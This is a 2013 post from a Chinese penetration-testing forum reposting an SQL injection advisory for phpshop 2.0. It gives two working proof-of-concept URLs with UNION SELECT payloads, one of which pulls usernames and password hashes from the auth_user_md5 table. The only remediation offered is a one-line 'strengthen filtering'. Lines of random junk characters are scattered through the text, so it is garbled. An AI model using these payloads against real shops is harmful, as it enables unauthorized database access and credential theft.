中国网络渗透测试联盟
标题:
phpshop 2.0 SQL注入及修复
[打印本页]
作者:
admin
时间:
2013-1-18 18:24
标题:
phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
4 d1 O1 O. A- L9 u
8 F& i5 X, E8 a" B8 D
作者 : By onestree
, t- f1 F) a3 \5 ^! j
下载地址 :
http://code.google.com/p/phpshop/downloads/list
0 M2 M: x. i; {6 O/ f4 S" } a
测试地址: windows 7 / ubuntu
) ~* [/ [7 p* ]; L$ \. i1 N
|9 b! f4 q& d
* x$ J6 m7 [" J7 G* p/ i
SQLi p0c:
8 k$ }) y' ^; S% |- K
( }, Q3 {. I- `" y# y$ ~4 k
==================
; I6 \# D" d Y- s: y* R1 k/ i# U
$ |$ u' F) q! q4 X8 b: A
http://www.xxx.com
/phpshop 2.0/?page=admin/function_list&module_id=11'
+ ~! Y" s2 _/ w* Z! W, W: G" i
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
3 G8 q% [ {2 ^
3 U& k. u2 p, S9 [# A
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
; i8 h: n3 I6 w4 i, @4 _% A
; O7 M; b0 n& q- x* g1 P5 |: \
修复:
8 B- a/ i: T3 ] E; a* T( {
加强过滤
4 R) H. A* y: ]! c: c: G6 G8 b7 K
% I) S4 b3 B* Y9 H v
$ y4 A) F5 f% i' ]! l
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2